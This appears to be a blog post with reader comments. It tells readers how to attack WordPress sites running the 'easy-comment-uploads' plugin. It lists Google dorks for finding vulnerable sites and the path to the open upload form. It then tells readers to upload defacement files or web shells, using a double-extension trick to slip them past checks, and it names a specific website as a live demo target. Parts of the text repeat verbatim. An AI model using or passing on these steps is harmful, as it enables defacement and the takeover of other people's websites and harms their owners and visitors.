Wordpress Exploit : Thousands of websites are vulnerable
Many of you should know about it, but i wrote this article because for ones who don't know about it, it could be fun!.
Google dorks:
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads
Open Google and enter any dork which Given,
Now select any website
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere
Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg
DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/
Thank you for reading stay in touch with filehouse for all latest updates..:)
and check it here site.com/wp-content/uploads/2011/05/yourfilehere
Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg
DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/
Thank you for reading stay in touch with filehouse for all latest updates..:)
I will recommend my friends to read this.I will bookmark your blog and have my children check up here often.I am quite sure they will learn lots of new stuff here than anybody else!
ReplyDelete@Monster
ReplyDeleteThanks